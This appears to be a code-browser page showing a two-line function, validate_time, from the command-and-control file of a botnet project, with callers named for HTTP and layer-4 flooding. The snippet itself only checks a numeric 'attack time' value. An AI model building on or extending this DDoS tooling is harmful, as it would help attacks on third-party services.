MCPcopy Create free account
hub / github.com/Hex1629/BotnetC2 / validate_time

Function validate_time

BOTNETc2/cnc.py:74–75  ·  view source on GitHub ↗
(time)

Source from the content-addressed store, hash-verified

72
73# Validate attack time
74def validate_time(time):
75 return time.isdigit() and int(time) >= 1 and int(time) <= 999999999999
76
77# Validate buffer size
78def validate_size(size):

Callers 5

http_flooding_sent1Function · 0.70
all_sent1Function · 0.70
all_layer4Function · 0.70
http_req_allFunction · 0.70
http_req2Function · 0.70

Calls

no outgoing calls

Tested by

no test coverage detected